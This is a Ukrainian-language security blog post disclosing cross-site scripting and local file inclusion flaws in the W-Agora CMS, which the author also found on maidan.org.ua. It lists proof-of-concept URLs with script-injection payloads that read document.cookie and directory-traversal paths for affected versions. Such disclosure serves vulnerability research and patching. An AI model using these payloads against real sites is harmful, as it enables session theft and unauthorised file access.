XSS та LFI уразливості в W-Agora
15:21 27.10.201029.08.2010
У серпні, 27.08.2010, я знайшов Cross-Site Scripting та Local File Inclusion уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я також виявив на сайті maidan.org.ua, як і попередні уразливості. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в W-Agora.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
27.10.2010
XSS:
http://site/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
http://site/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Уразливість працює в версії 4.1.5, але не працює в 4.2.1.
http://site/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E
Local File Inclusion:
В папці conf:
http://site/news/for-print.php3?bn=1
http://site/news/login.php3?bn=1
В будь-які папці (тільки на Windows-серверах):
http://site/news/for-print.php3?bn=..\1
http://site/news/login.php3?bn=..\1
Уразливі W-Agora 4.2.1 та попередні версії. В останніх версіях системи скрипти php3 мають розширення php. Якщо адміни maidan.org.ua виправили уразливості, то розробник системи дані уразливості не виправив (але після публікації попередніх дірок в багтреках, розробник схоже почав їх виправляти, як мінімум виправив зазначені XSS на офіційному сайті системи).